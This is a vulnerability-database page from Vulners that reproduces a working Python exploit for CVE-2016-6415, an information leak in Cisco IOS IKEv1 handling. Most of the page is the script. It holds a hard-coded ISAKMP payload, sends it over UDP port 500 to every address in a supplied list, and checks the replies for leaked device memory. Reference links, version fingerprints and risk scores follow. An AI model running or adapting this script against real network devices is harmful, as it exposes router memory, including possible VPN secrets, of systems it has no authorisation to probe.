Vulners
Lucene search
Cisco IOS 12.2 < 12.4 / 15.0 < 15.6 - Security Association Negotiation Request Device Memory
10
#!/usr/bin/python
# -*- coding: utf8 -*-
import socket
from scapy.all import *
# ---------------------------
# Requirements:
# $ sudo pip install scapy
# ---------------------------
conf.verb = 0
RCVSIZE = 2548
TIMEOUT = 6
payload = '>5\xc7\x07)\xdf\xed\xef\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x02'
payload += '\x00\x00\x00\x00\x00\x00\x00\t\xe0\x00\x00\t\xc4\x00\x00\x00\x01'
payload += '\x00\x00\x00\x01\x00\x00\t\xb8\x01\x01\x04\x01.\xbf\x19<\x00\x00'
payload += '\t\xac\x01\x01\x00\x00\x80\x01\x00\x06\x80\x0b\x00\x01\x00\x0c\x00'
payload += '\x04\x00 \xc4\x9b\x80\x02\x00\x02\x80\x04\x00\x01\x00\x06\t\x84'
payload += '\xaf\xe30\x12w\x0b\xe2\xaa\xe1\xe9D\xb3F\x07mZ\x8b'
payload += '\x16N\xc1c\x1f&\x81\xd2\xd5\xa3\x03\x1b\xf6\x83\x04'
payload += '\xa2\xbe\\y\x8e\xd0\xcc\xc1VRWh\xdf"\x0f\xfeXI\xbd#\xfc'
payload += '\x99\xab:\xfa\x04\xbeM\x8a\xc4N\x1d\x9f\xc07m\xfaD\xaf\xc8'
payload += '\xba\xd2\t\xcc.\xff Zw\xcf\xa4K\x92\xea\xf7Hl\x1e&\xc9\xb8R'
payload += '\x1c\xb9\x9b\x8c~\xa2TkZ\t\xf1\n\xb0P/\xc4/c<\x9f\x85\x15'
payload += '@\xfbC\x1d\\\xd8,\x10c\x88\x10p\xe8\x0e\xab\xbd\x95+\x02'
payload += '\xf0X\xaer\x9fY\xa5\xff\xe2T\t\xbe\x86_\xde\x10\x8dB\xe9'
payload += '\x19sZ\x99_e\xa0\xdf$2}^\xb9\xefc\xbd\x18U\xaeA<\xef\xc6'
payload += 'n`\xe8\x8d?\xa7y\xe9\xa3\xc3\xb5\x9a{:\xb9s\x08;X\x0fx\xa0'
payload += '.\x978\x80W\xe9\xd8F\xa6 \xa5\xae\x9bx\x12\xcf\xe4\xcb\xe0'
payload += '\x17\xeeT.\x81~\xb4\x0c\xcf\xcf7\x08\xce{\xd0?\xc57\xcfM>'
payload += '\x99$*\xde\xa2;\xe2\n\xe4\xb8\xeb3B\x06\xb5\xab\xc3A\xe62N'
payload += '\xb4B\xabY\x1a\x08\xa5mb\x91\xda\xd73\x8e\xbd\x07\xea\xf3\xbf'
payload += '\x1c\xce\x89\n{UX\xd5W\x91M\x17\xe7\xa4\xdf~\x9dH\x83\xab\x92'
payload += '\xfciJ\x8e\xe3k\x8a\xd3\xd1*\x81.\x99\x03S;8\xb4SE\xd2.S/\xc5'
payload += '\x87\xa1\x11$\xfd\xa6\xf0\x1e\xfe\x9f\'B\x87\x00Z\x88b"\x1ceq'
payload += '\xdb\t\x81\xb7\xef\xf6\xb3n\xc6 \x83\xa3\xea\x0b;\xba\xe1\x81'
payload += '\x07\x91\xac\x11\x87\x9a\xc08\xd2E\xc2PfA\xadW6\xd3\x12\xebeI'
payload += '\xff\xef\xf0\x834 \x90\xa0\xb1\xf0A\x8d\xec!ZN:\x98\x1a\xecD'
payload += '\xaa\x06.\x17X\xa4M\xaf\xcc\n\xf5\xf2\xc6\xe3-\xedHWY\xac\x12'
payload += 'P\x80\x8a\xf5\xf8\xf7y\xc8\xfe\xa4\x9d\xab\x16O\x8f\xc2\xdfu'
payload += '\x15s\xae\xca[\xd7\xf3/\x88\n_\x17\x82RC\x08l\x97\xb7\xf3\xef'
payload += '\xfd[\xe3P\x1c\xb4\x19\x17\x7f\xc4\xcd$\t1n\xc0l\xeb\xc2~'
payload += '\xd6\xb1\xfcs\xd9\x0c\xfc\x03'
payload += '\x86\xf1\xc4\xef\x90(\x9d\xf04\xd2\x98k\x0fM@k\xf2\xef\x16'
payload += '\xbf8\x81\xe2\xf8k[d\xac\'\x93\x7fnZ\x9dJ\xa8\xbaIM\x1d>'
payload += '\xe6L\xc3\xaeD\x08\xf6\x83\xb8\xc7ao&\x97\x13\xb1\xd3,&\xc9'
payload += '\xc1\xa0\xb5\xbai\xa8qpE\xc7`\x03\x8a$\xb0E\x8e\x8aM\x1a\x07'
payload += '\x9a*\x8a]-\x90\x0c\xd7\xa8+\x8bIbe\xba\tr_Bu\xda\xe5\xd4MrYqN'
payload += '\xdeg"L-@\xc3\nT\x86\xd8C\xc8\n\x03\xec\xab\xfb\xbf\xf3i4'
payload += '\xb0\x85\xa5\x97\xbc\xdeA'
payload += '\xf9\xeb\xb8D\xcfF\x8f\x93[=b\x8d\xba\xeb\xeec\xf8\x99\x02'
payload += 'L#"u\xb1\xc0f\xa4\x11\x9f%\xfc\x8bC\xbcY\x98r\xb7\x880\xa3'
payload += '\n2yl+\x8d\x9a\xff\xf7\x04\x18\xd5\xc1j\xbb\tot\xb7s}\xbb'
payload += '\x10L\xff;\x1c\xf1\xa10\xfa\xc2e7"\xdf\xd3\x9d\xe4\xa9\xfd'
payload += '\xf6A\xee\xb2\xb02=J\xfb\xcf\xebT\xa8\xc0\x1et\x1cz|\xde'
payload += '\x12>\xed\xc3\x93\xeb\xd2{\xf0<\x1c\xff\x8fg\xfb\x8f\xd7'
payload += '#4I\x8dK\xa9iu\xf4\xd0\xb0u\xd2\xb8'
payload += '\x0c\xe6U\xba\xe8\xcc,\x06\xbf\x93q;F;\xae<\x1d][\xba'
payload += '[\x10\x06\x97\x15y\x02\x1f\xe1<\xff Y\xfa\xb2\x0c\xbdb'
payload += '\nm\x81\xb2\x99\xf5\\!\xe63\xa6\x13e\xf3\xa1u\x117n\x8cw'
payload += '\n\x97\x81\xbe\xf5\x82\xcc\xdb\xbf\x0cB\xc9\x08b\xb5\x9dGt'
payload += '\xff\xd0\xbb\xf3\'6\xdbZ!\xe9\x99\xc3\x972i\x98\xf4\xfb\xef'
payload += '\xf7Q\xee\xe8\xa5\xf0\xd4\xa91PLS\xb1-\x0f<~\xc1\xbe\x9d\x85'
payload += '\xe31\x1a\x83,=\xa5\x94\x16\x00tq\xa9f'
payload += '\x05\xcal*\x9f\xd6\xec\xb9&\xc9}\xbd\x84\xdf\xd5\xd9\x10\xbd'
payload += '\x11\xe0|R\xef\x89\x98\x85d3F\x11\xc4D\x12\x02:\xaby\xf5\xcc'
payload += '\xaa\x17\x0b\xffm8\x88\x07Ym\xd0{\xcaE.,t9\x11\xa2\xf2L\x1e'
payload += '\x06\x8aY\x96\\K\x9c\xf87\xd05k\x03\x9c\x00\xda/\xc7\xa3\x10y'
payload += '\x1a\x80\x05\xde\xc8\x06:/\x08\xc3?\x15\xe9\x85\x97V\xb0\x80^'
payload += '\xbeT\x7f\xb7\x08V\x9f:\xfa~\x0bb\xdf\x8236\xfc\xe8\xf8\xb4N'
payload += '\x886\xdc\x94\x952'
payload += '\x12\x97s\xfdn\xee0\x10\xaeg\xc9\xfb\xe0\xf9!\xd6j\x8c\xe2'
payload += '\xbd\xf4\xc21\xca\x89t\x18\x03:\xc7(B!\xcfa\x08\xcc \x8c'
payload += '\x12\xa2\n\xeb\x875\xe2~\xe95\xacA\xa2\xc3\xd6W\x1c\xcf'
payload += '\'o\xacZxv\xac\x88"\xb5w\x02\xae\x8b-\x16-p\xdezd\xbec['
payload += '\xc7n\x12~QA\xc0\xe6\x9dQ\'\xf0\xe0"\xb1::\xfe\xd8$\xd1'
payload += '\x8bSa\x84\x8d\x0c\xd24g\xe3\xfe\x8d\xe4\x01\xd2c\x08\xda'
payload += '`Y 5\n\xf9\x08\xcc#\x80!\x9b\xb4^\xcbu\x02'
payload += '\xd9g\x00\x0f\xbcy\xe1\xf4\xf0OD\x7f\xe4\x96\xe5J\xb6\x14'
payload += '\xa8j\xce\x1b\x06\xf3\x13V-\x07\x9b\xe9,\xe3J\xb8\'\xf0U~'
payload += '\xd2p\xde;}\xf6NY\xfa\'\x8e\x1a\t\xfc\x89\xe3\x07\xdc\x06'
payload += '\xc10\xef\xd61\x03\x05=s\x9b\x90\x1eR\x91\xa8\xb1\xa2\x15)'
payload += '\x9bj=\x881\x03@Ck\xad\x045\x94\n\x83W@\xcdeD\xe1\x8dX\xf2U'
payload += '{\xa2\xd8\xbb\x04ogfE\xe0s\x9az\x08\xf12 \xb9\x06\xeb]\x19'
payload += '\x1aW\xb6ju\x11\x1fn\xdbC\x84\x1e'
payload += '\xea -\xba\x8f\xd0\xa9\t\xf1X\xcd\x13\xe1e\xd4\x98\x93!)xb'
payload += '\xff\xd5\x90\xcfB|\xce\x16"\x0e\x89$L\x9e$\xb1\xf0&\xe7\xe9'
payload += '\x1b\xaa@\xd2K\x97\xc3\xf0\x0b\xed\xd5p\xef\xa8\x04\xa2\x9a&'
payload += '\xc0\x01\x8d\x9d$c\xf7"\xc6u\x18\x030+\xbeC\xce\xab\xc1\xee'
payload += '\x1c\xe2\x11C;\x0b%\xcb\x99\xd1\xbc\xe6;\x86BB\x1a\x98\x02'
payload += '\xe9\xf6P\x98+s\xe9\xd3i\x04!\xdd\xa1\xd1\xc1\xedY\x07\xf0'
payload += '\n\xc4\'\xde:Ai\x9d/\x19p\x91'
payload += '\xc5\\?v}\xdd\x91\x888?\xaa\xc3\x0c\xc6\xcf\xe7\xf3\xc6d'
payload += '\xf4\x08\n\xa4U\xaf\n\x04\xd9/\xec\xcb\xe4\x98\x99\xb7\x1e'
payload += '\xa7/\x85\xdf\xa2M\x89~\x08\xfd\x08\xc7\xf3\xa6\xc0*rK=\xad'
payload += '\xa5\xe6\\\x08)aZq\x97\xbf\xe9\x9b\xd0\tV\x9d\xc2\x19\x92'
payload += '\xf1m\xf8\xdcu\xe2\xe8\xd2\xd7\xdb\xd9{\x0c\xb2\xbd\xed'
payload += '\x1fj\t\xcc&\x9c\x87\x9cs:\xd1\xbe\x88\xdb\x18\xce\x0b'
payload += 'f&\xf6q\xd06n\xe6\xc5Q\xa4i9Bp\x80\xe5$\xc9'
payload += '\xf8-\xe8\xce\xf1q\xd5A\x89\xe41\x8a\xf8\xa5Q\xe2\xf0\xb3'
payload += 'ho-\xfc\x11\x12\x1btD\x190\xc0\x16@>\x0f\x9e\x08rT^\xdf'
payload += '\xd9z6}!\xb3k9\x97y\x97\x9a\xd8\xcd7\x17\xc5\xbd\xe4\xa2'
payload += '=&2\x9f1\xa0\x9f?\x8e\xfb\xf2\x07\ti\xc6\x05\xc9\xfa\xf8M'
payload += '\xa3\xe6\x0e\xaeN\xc5:-\xa4\x8aI\x1bNo\xb5\xedN\x8c\xa9'
payload += '\xda \x18\x8a\x18\xd2(\xc3\x97\x15\xe9]\x9a\x85\xaay\x82'
payload += '0\xa4N=\xb5\xaa0A\x81\xed\xea]A\xa6Pu\x06\x18'
payload += '\x83\x9c\x91\x86\xc6\x90\xc3<\xb6F\n\xe3\xfd\xdf\x0e\x17'
payload += '\x1f$y\xd5\xb6\xb6\x9e{\x00~/L\xae\x10\x9fDo\xbf[KF\xd2*'
payload += '\x90sa)\x92M\x00\x9f\x13\xb8V\x811\xa7\xe17gFRh"@zR=\xf3'
payload += '\x83\x94\x9d_\x83Ax\x01I\xce\x99P\x11\x11@\x8b\xc7\xbc\x94'
payload += 'd\xae\xe3r\xc7]\xc5m\xc7J\xa1\xb7f\xba%\xb9G\xe0+C\xc5\xa2'
payload += '\x9e\xe5p\xb6\x7f\x0b\xa3 L\xa7\xd7\nf\xaa\x19\xe8\xe1&jT'
payload += '\x89\xfcv\t\xd4\n\xec\xf5\x8b\xc9\x04\xb6'
payload += '\x1b\x1c\n\x83\x11=: \xf3\xa7z \x13\xcf\x96\x8a\xb2\x9bk'
payload += '\x04\xb7\x86\xea\x99\x05\x043\xe5_J\xc9bh\xf1\xadE\xe8'
payload += '\x13O\xf4\xfbx\x98\x95\xef\x86B\xac\x0b\xac-\xbb\x82\xfav'
payload += '\xf5\xa1\xbe]B\xa5\xd6\'\xb8]6\xc7\tXW\xc4C\x97\xa2\n\x8c'
payload += '\x02\x89\xc3h`(\x05\x9d_\xb9\xf99\xbf\x1bJ<\x83\x02\xe9'
payload += '\x84\x83\xc7K\x9e\xcf\xaf\xf8r\xd2\xf1!\xc8\x0f\x862'
payload += '\\\x99@OK\xb5TL\x03d\x92\x81\xb5S5+\xec\x0e\x96\x8f'
payload += '\x08\xf6I[PP\xd0\x89\n\xb5\xe5\x17\xbd\x8d\xbd\x86\xd3'
payload += '\nZ\xfa\xc7\xac\xa5\x9d\x7f8\x91\xc8\xcd\x93K\x84\x1d'
payload += '\x03\t\xd8i\xf1Z7i\xb3\x0eQ\xe1<\x1a\xac\xd7\xd5\xc3'
payload += '\x1fv\xd7K\xe9\xa5j\xba\x15\xe9hN]\xb0\xb0\xcf3\x0e'
payload += '\xc6\xd7U\x8d$0a\x8f\xff\xd4X\xdb(%\x06\xbf\x9e\x8c='
payload += '\xf2C\xba\x80J\xbdU8\xafpL\xb8\x9e\xd5\x94\xca\xc9\xf2'
payload += '\xda\x10H\x19\xf2\xcc\xae\x04\xe1t\\1\xbc\xa3\x96\xaa\xd6\x04{\xe8'
payload += '\xca;\xc3\xce\xa2{\xb4\x9b\x15c&\xe6\xe31v\x8f\x9c \xdfj_\xa7'
payload += '\nT\xae\x06m\x8a\xe4\xbb!p\xb5]\xfb\xdf\xa3K\xc7k\xc66\xa7'
payload += '\x19L\xe4\xcc\x99\x04,8*\xbf\xf9\x83\x80`S\xb9\x9d\x1d'
payload += '\xcaI\xca.{\\\x9b\x1e\xb8r\x93\x8b\x08\xf9=*T\x80\xb8a'
payload += '\x9aq(\xf2oq{KCs\xdc\xcdN\x1c\x87\xfalq\xc5\x82\xf8\x89'
payload += '\x13kS\x00\xf3\x9a\xe4\xbaC\xc0\xc2T}\x86\x85l\xe4B\x95'
payload += '\xb7ru\x86\xf5\x1e}j5\xe2\xe9\xfeG\x16\x8c\x1c'
payload += '\x01b\xe9\xd0\xd1\x16\xa4)\xf0\xcb0*W\x9f\x9fT\xf5\x12'
payload += '\xea[\x8b\xdd\xb6+\xf2\x04\x06\x916\xa7\xc6e\x96\x8cx'
payload += '\xe0\xfe\xd4u\x96\xc8c\xe4c\xdd\xca@f\x7fj\xa4\xe7`'
payload += '\xa5\x8b\xff\xe7\xed\x1c\x00w\x18\xbe[\xef\xe4\x1f'
payload += '\xa4?\x8c\x90\x80\x05\xbf\xe4\xd9\x9e\x964\x16\x16'
payload += '\x0b\xf0\xbfn\xd8\xa7_\x9c\nm\xb5DA\xa2\x10Hy\xb5'
payload += '\x82\x88\xa7\xb3&~\x91\xa3?\xd6*\xd9\n;^t\xc3'
payload += '\x1f\x08\xcc\xb1\xc0\x9d}\x9eJ'
payload += '\xe6\x89\xbf\x03h:\x90Y\xfb\xe6R|\x0fInW\xaf'
payload += '\x16\xffz\xd4CL&r\xdd\x15y\xa9Z\xe7p\xbc\xeb'
payload += '\x1b\xf3\x811\xe1V\xc4$?\xe9\xda\x1fj\xa9J\x05\xe3'
payload += '\x96I6\xdaNa\x93\x1e\xac\xd9I\n\x15\x10\xf0\x1f\xbb'
payload += '\x07\x00"\xd3\x94Eth\xa4\xf7gz\xdehu\xce3'
payload += '\xf8\xc0mS\x80\x03\x00\x01'
# print(len(payload))
# cisco - IP/UDP/ISAKMP
def exploit(host, port=500):
# ikev1_pkt = open("sendpacket.raw").read()
data = None
try:
# print("[+] exploit CVE-2016-6415 - {}:{}".format(host, port))
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# IP/UDP/ISAKMP
client.sendto(payload, (host, port))
client.settimeout(TIMEOUT)
data, addr = client.recvfrom(RCVSIZE)
except socket.timeout:
pass
# print("[*] timeout - {}:{}".format(host, port))
return data
def is_vulnable(host, port):
data = exploit(host, port)
if data:
isakmp = ISAKMP(data)
# ls(isakmp)
if isakmp.haslayer(ISAKMP_payload):
isakmp_payload = isakmp.getlayer(ISAKMP_payload)
# leak memory data
# isakmp_payload.load
if isakmp_payload.length > 0 and isakmp_payload.load:
print("[+] exploit {}:{} succesfully".format(host, port))
return True
print("[-] exploit {}:{} Failed".format(host, port))
return False
if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
with open(sys.argv[1]) as f:
for ip in f:
is_vulnable(ip.strip(), 500)
# https://github.com/adamcaudill/EquationGroupLeak/tree/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1
# https://tools.cisco.com/security/center/selectIOSVersion.x
# https://isakmpscan.shadowserver.org/
# https://twitter.com/marcan42/status/766346343405060096
# https://nmap.org/nsedoc/scripts/ike-version.html
# http://www.cisco.com/c/en/us/about/security-center/identify-mitigate-exploit-ikev1-info-disclosure-vuln.html
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6415
# [+] ---- Fingerprint: ---- [+]
# cisco pix
# cisco pix 6
# cisco pix 7
#
# 500/udp open isakmp udp-response Cisco VPN Concentrator 3000 4.0.7
# Cisco Systems, Inc./VPN 3000 Concentrator Version 4.7.2.L built by vmurphy on Jun 11 2007 14:07:29
# Vendor: Cisco Systems, Inc.
# Cisco Systems, Inc. 12.2
# Cisco Systems, Inc. 12.4
# Cisco Systems, Inc. 15.5
# Cisco Systems pix
# Cisco VPN ConcentratorData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Mar 2017 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 25
CVSS 3.17.5
EPSS0.92676
SSVC